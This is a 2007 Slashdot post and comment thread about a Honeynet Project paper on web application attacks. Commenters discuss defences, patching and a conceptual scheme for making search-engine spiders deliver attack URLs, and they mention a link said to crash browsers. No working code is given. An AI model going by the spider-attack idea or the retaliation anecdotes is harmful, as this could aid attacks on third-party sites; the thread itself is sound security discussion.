Posted
by
kdawson
on Sunday February 25, 2007 @11:08PM
from the spider-to-fly dept.

An anonymous reader sends us to a technical white paper written by the Honeynet Project & Research Alliance: Know Your Enemy: Web Application Threats. Based on analysis of malware collected by the project, the paper outlines a number of HTTP-based attacks against web applications and some ways of protecting Web servers. Included are code injection, remote code-inclusion, SQL injection, cross-site scripting, and exploitation of the PHPShell application.

Aesthetically speaking, it's not very pretty, and even one 5 MB image can be pretty devastating to a cable connection. And I doubt the ability of whatever image-host it was to cache the image properly: you need the right headers to be sent and so many people get these things wrong.There are also cases where people crash entire operating systems by using up all the video card's memory, see ha.ckers.org/imagecrash.html (WARNING: may crash you, though latest version of IE is not affected).

So I decided to teach this jackass a lesson and use a rewrite rule that turns those image requests into humiliating messages about himself. [...] If you're going to do something like this, don't do it from your real account./i>

What makes you think he did? For all you know, he goaded you into attacking somebody he doesn't like.

Well, don't use "nobody", use a non-shared account with a name like "www". And chroot won't help you with a SQL injection attack, especially if the scripts log in as "sa" (don't laugh, I've seen it done).

If it's the apps being attacked and not the server, the first line of defense is to sanitize user input.

Or maybe like the science articles the subject flies over most heads. Just because it's called "news for nerds" doesn't mean that the majority have a nerds understanding. Now the YRO section is more illustrative of what slashdot has become.

It might have went over non-web developer's heads, I'm not arguing over that (I'd still expect the chair/soviet russia/does it run linux/imagine a beowulf cluster/whatever memes to be here though).But for the other part of/.'ers that develop web apps, this stuff is rather obvious. The same old issues:-register globals - 'nuff said-SQL injection (rather crappy explanation, and an extremely basic one here - there's FAR better articles on this!)-people not validating stuff before they use it-XSSetc.

Based on descriptions of the attacks in the article it looks like your general attacker is some kiddie that wields Google like a broad sword. Sure, they did have some attempts to recruit the honeypot into a bot net or set up a phishing attempt but most of the attacks just overwrote index (with text from a tutorial no less) or moved around in the file system. I didn't know the ratio of kiddies to people who know what their doing was so out of whack.

The basic theme of this seems to be "patch! patch! patch!". A lot of the scripts they discussed (AWStats, phpBB, etc.) are ones where the people who use them don't have the expertise to dig into their code and fix problems themselves (or possibly even understand what the problems are).

The three rules of running a web app you didn't write:

1: Subscribe to the announcements mailing list

2: Apply patches immediately

3: Back-up your shit regularly, because even if you do 1 and 2, you might get hit and then you're going to need your backups.

Rule three is sort of universal for any webmaster, whatever they're running, even if they wrote it all themselves and have security certifications up the wazoo. Not running back-ups is about as wise as putting your 401k funds into lottery tickets.

It's a good article for people who aren't focusing on security professionally. It shouldn't be news to anybody who keeps up with trends, though -- is anyone really still using register_globals?!

Michal Zalewski pointed out a cute hack some years ago. Search engine spiders have to follow links that end in queries, like "toparticle.php?page=1". Barring extraordinary and ultimately impossible care in the coding of the spiders, they could also follow URLs that include attack code after the question mark. In _Silence on the Wire_, he imagined a crook building a long list of links to potentially vulnerable systems, appending attack code to each, and leaving the list someplace where Googlebot and its colleagues will find it. Googlebot could twist the doorknob on 1.5 million PHPBB systems a lot faster than the crook possibly could.

As GP stated, you could publish on any webpage a list of links that contain malicious code in them. When Google, Yahoo, and other spiders crawl the links, *THEY* end up doing the attacking. That is rather dangerous, I'd say - it'd be very difficult to track down the person responsible, especially if the original webpage was posted on a zombie server.

By The Web Application Security Consortium
"From a counter-intelligence perspective, standard honeypot/honeynet technologies have not bared much fruit in the way of web attack data. Web-based honeypots have not been as successful as OS level or other honeypot applications (such as SMTP) due to the lack of their perceived value. Deploying an attractive honeypot web site is a complicated, time-consuming task. Other than a Script Kiddie probing for an easy defacement or an indiscriminant worm, you just won't get much traffic.
So the question is - How can we increase our traffic, and thus, our chances of obtaining valuable web attack reconnaissance?
This project will use one of the web attacker's most trusted tools against him - the Open Proxy server. Instead of being the target of the attacks, we opt to be used as a conduit of the attack data in order to gather our intelligence. By deploying multiple, specially configured open proxy server (or proxypot), we aim to take a birds-eye look at the types of malicious traffic that traverse these systems. The honeypot systems will conduct real-time analysis on the HTTP traffic to categorize the requests into threat classifications outlined by the Web Security Threat Classification and report all logging data to a centralized location."
http://www.webappsec.org/projects/honeypots/ [webappsec.org]

Take your eye off the ball and lose your server, it's as simple as that.

If you have a server with a lot of PHP applications running, you need to watch them all. I forgot about a CMS installation on my server that was being preserved for historical reasons (not even linked from the front page, but obviously visible to google), and sure enough, it got exploited via a remote inclusion attack and was used for nefarious perposes for a while without being noticing.

Checking the logs, the definite path of attack was a google for a known vunerable version of the CMS system, and then application of a perl script to perform the hack. Clearly the vunerable system goes into a database of known vunerable systems that gets shared, because to this day, despite the CMS system being backed up and taken offline, my server get attacks about once every 20 minutes from perl scripts targeting that CMS.

I also regularly see bots automatically filling in registration forms with spam, and wikis getting referrer comments added to them or even the content changed by bots.

Looking after even a smallish webserver has proven to be a royal pain in the proverbial.

Regarding PHPShell, I'd hope most people hash their password in the config file rather than leaving it plain-text, and also hide it away somewhere non-obvious (maybe behind another level of protection to keep the webcrawlers from spotting it). But even with hashed passwords, logging in still uses a plaintext password, and is thus equally vunerable to good old ftp and telnet password sniffing. The Joomla extension to provide a plugin PHPShell is a worrying development, and I'm sure will lead to more PHPShell discoveries on servers.

Really the only way to avoid being compromised if you have a semi-busy site, is to learn how to compromise websites yourself, and try it on your own site (and it also teachs you what to look out for in logs). This in combination with regular patching seems to be the best way to stay one step ahead.

And yes, keeping the evidence is good - it gets stupid kids kicked off their ISPs when you send them the proof.;) Now *that* is some satisfying karma.:)